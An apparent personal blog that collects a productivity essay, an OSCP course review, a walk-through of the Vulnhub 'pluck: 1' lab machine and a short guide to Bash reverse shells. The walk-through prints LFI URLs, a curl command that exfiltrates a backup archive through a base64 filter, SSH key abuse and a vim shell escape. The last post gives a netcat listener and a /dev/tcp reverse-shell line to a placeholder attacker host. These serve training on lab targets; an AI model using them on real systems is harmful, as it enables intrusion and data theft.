Getting things done. The Cook Model

All of us have projects to be finished and many people do not continue their projects for different reasons. In this post I will talk about a routine usually I do follow to help me finishing my projects, I hope you find it useful.

I call this routine The Cook Model. this routine is simple yet effective, Just like any meal you want to prepare, you have to follow 3 phases in sequence to have an enjoyable meal.

1. Prepare:

This is the initial phase and the most important one I think. In this phase you are hungry and start preparing for the meal by buying the grocery, Reading preparing instructions and so on.

So does in projects, you got to have the reason why you want to start this project, why it’s important for you and what is the expected result.
Your strategy must be clear and defined, Please be honest with yourself and take in consideration all the hurdles you may face and what power or tools can help you.
Take as much time as you want in this phase to do your research, setting plan, buying tools/books, talking to people, looking for alternatives and so on.
By finishing this phase you will have an agenda to follow with specific tasks and time frame.

2. Cook:

Cook your meal! Follow your agenda in phase 1 step by step. You can’t change your mind now in the middle of the cook by taking out the chicken of the grill and try to Fry it! You will ruin the whole meal.

This is the action time, you have to follow your agenda step by step and believe in the work you have done in phase 1.
You have to be patient and be persuasive, it’s a one way route and you can’t rethink about the plan or try to take a detour. This is where most people fail because they keep questioning their goal/plan and try to start all over again, and by that they start juggling around in hope to find a better settlement.
I can sum this phase in one word: “commitment”.

Result:

Now that you have done your job it’s time to taste the meal, is it salty? Need more time? Or just delicious ?

In this phase it’s not important if you success or fail, be proud of the effort you have done because you did reach the final destination. Some people do stuck in the previous phases and can’t reach this final phase so it will be an unfinished project for them and they can’t enjoy the result or evaluate the fail.
If you success then be happy and enjoy your achievement. If not then there is lessons to be learned from this experience and you can start all over again by modifying phase 1 and continue your project.

Fin:

You only need one person approval and this person is you. Take responsibility of your project and quit caring about other people opinions/experiences.
Most people do fail because they get stuck in infinite loop between phase 1 and 2 due to different reasons ( people opinions / self doubt / circumstances / etc ).
This is a one way route and you have to keep moving forward, don’t hesitate or settle for less.

pluck: 1 walk-through

In this post we will walk-through the pluck: 1 VM So let’s start !

Enumeration:

We will scan all TCP ports along with top UDP ports

root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason 192.168.17.153  \
> && nmap -sU -sV -A --top-ports 100 192.168.17.153 \
> && nmap -sU -p 161 192.168.17.153 \
> && nmap -sU -p 69 192.168.17.153 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03
Nmap scan report for 192.168.17.153
Host is up, received arp-response (0.0010s latency).
Not shown: 65531 closed ports
Reason: 65531 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 00:0C:29:1E:99:39 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.05 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03
Nmap scan report for 192.168.17.153
Host is up (0.00061s latency).
Not shown: 98 closed ports
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00074s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00056s latency).
PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

The website on port 80 is powered by PHP, I did try many PHP tricks to check for vulnerabilities and discovered that the site is prone to LFI and PHP base64-encode trick !

http://192.168.17.153/index.php?page=/etc/passwd

now we have a list of users:

  • bob
  • peter
  • paul
  • backup-user

Exploitation

I did try to brute-force , SQLi the admin login page but no luck.

Next I went back to the users list and tried to include the backup script mentioned in login shell of backup-user

http://192.168.17.153/index.php?page=/usr/local/scripts/backup.sh

We can try to include the tar file but this will be a total mess ! so let’s make a use of PHP base64-encode trick to download the file safely by encoding the data of backup.tar file then cut the HTML around it and decode it locally.

curl http://192.168.17.153/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup

After extracting the file We notice the existence of keys folder containing SSH keys of the user Paul, We will test the keys until we get a valid SSH login

ssh paul@192.168.17.153 -i id_key4

We are presented with shell login of menu type in this case Pdmenu, However We can escape this menu by selecting Edit file and type any file name to start using the vim.

:set shell=/bin/bash

Then type the following to jump on Bash

:shell

Privilege Escalation

I did try to escalate using Kernel exploits but no luck, However after searching for SUIDs We can notice the existence of exim agent.

paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

I did try some exploits to escalate the privilege using exim agent but did not work for me, However I decided to give this exploit a shot since the difference in version is minimal and luckily this exploit works.

Flag:

 

 

 

 

 

 

 

and that’s it.

 

OSCP Review

Intro:

I have been developing Software for years, However had a great chance to switch my career path to be in security field recently and that’s why I started looking for trainings to gain more skills.
Security for a software developer is writing a good code, running scanners, setting firewall, etc.
but there is still a missing link, how can hackers break into servers, what tools and techniques they use?

Enter OffSec:

In my journey for finding the right trainings, I reached OffSec since I was using Kali Linux as a platform to use scanners.
I was skeptical at first but after reading different reviews I decided to enroll in PWK course since I am a big fan of Linux and I need a training with a hands-on experience to know how hacking happens.

Materials:

Fast forward after registration, I received the e-mail package and start reading…
Well I have to say, this is indeed a 101 course but the topics covered is broad and wide.
OffSec will takes you in a journey to all hacking topics, you will know the How and the Why for each concept in a self-learning way.
as Morpheus said: “I’m trying to free your mind, Neo. But I can only show you the door. You’re the one that has to walk through it.”
I did spend two months reading the materials without rushing to know all the topics and connect the dots before hitting the lab, In the same time I did solve the exercises and skipped the ones required more engaging to do it later on.

Lab:

After finishing materials reading and taking summer vacation for one month, I was ready to hit the lab.
I have to say the Lab is just fantastic! I was overwhelmed and running around like a lost sheep in the first few days, but after that I start enumerating the whole lab network and start hacking the low-hanging fruit boxes first.
I spent approximately 3.5 months hacking the lab machines and was able to hack fantastic boxes like PAIN, Sufferance and gh0st. But personally I like dotty.

Exam:

after hitting 32 boxes, I felt ready to take the exam to test my skills.
my first attempt went bad and failed, the exam is BRUTAL but was an eye-opener and knew my weakness.
I did take multiple exam attempts and with each attempt I was gaining more and more skills, it’s a tough process but the aftermath of it is HUGE and learned/tuned a lot of things.
If you want to take the exam then you have to be 100% ready for it. 80% or 90% will not be enough, you have to Try Harder and Harder.
On Saturday 25-3-2017 I passed the OSCP exam with a BIG smile, it went smoothly and I was able to finish the exam along with writing the report in the 24 hours time slot.

Recommendations:

  • you have to change your mindset, in this course you have to think like a hacker or a breaker because developers expect the code to work in a certain way but the hacker will try to twist the code to get in.
  • study and research, you have to read a lot of information and test it to understand what is happening and why.
  • its simple, sometimes it’s plain simple to hack in and you do not have to go deep in the rabbit hole.
  • set a game-plan, know you target very will and spend time reading the enumeration data to set a proper game plan before start hacking Otherwise you will waste your resources.
  • practice, download images from Vulnhub.com and practice. Also I do find the walk-throughs a great way to learn from other people experience.

Final Toughs:

I do encourage anyone seriously interested in Information Security or Hacking to enroll in PWK course, the learning curve is high and you will learn a lot of things in a short amount of time.
you have to dedicate effort/time for this course, otherwise you can’t learn or pass the exam.
the community and OffSec people are great and you will learn many new things, Definitely I will enroll in other courses and try to engage more in the community.

References:

the below links did help me much when I was studying the course

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

http://www.fuzzysecurity.com/tutorials/16.html

https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/

http://www.blackhillsinfosec.com/?p=4645

https://highon.coffee/blog/lfi-cheat-sheet/

http://netsec.ws/?p=331

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Bash Reverse Shell

In this post I will talk about a special type of reverse shell, I like this type of shell because mostly you can use tools already exist on your target.

But before start talking about Bash Reverse Shell in details, I would like to mention some limitations about this type of shell:

  • You can’t use this type of shell against Windows targets since bash is not there.
  • You can’t use this type of shell if the Unix-Like target do not have the Bash package installed. However you can use the ancient Bourne shell (sh).

Now All you have to do is to setup a nc listener on your attacking machine.

nc -nlvp PORT

Then Issue this command on your target.

/bin/bash -i >& /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1

where :

  • ATTACKER-IP is your attacking machine IP address
  • ATTACKER-IP is port used by nc listener

And that’s ! you should have a bash reverse shell by now, This reverse shell was created thanks to Bash capabilities and Unix-Like File descriptor handler.

You can replace /bin/bash by /bin/sh if the target machine lack bash package.

Final Thoughts:

As always you have to enumerate your target to know the environment in front of you. In our case you have to check for Bash or Sh existence and located where.

this post serve as a short note on how to create a Bash reverse shell, please read more about the software or technology used in references.

Regards,

Fahad.


references: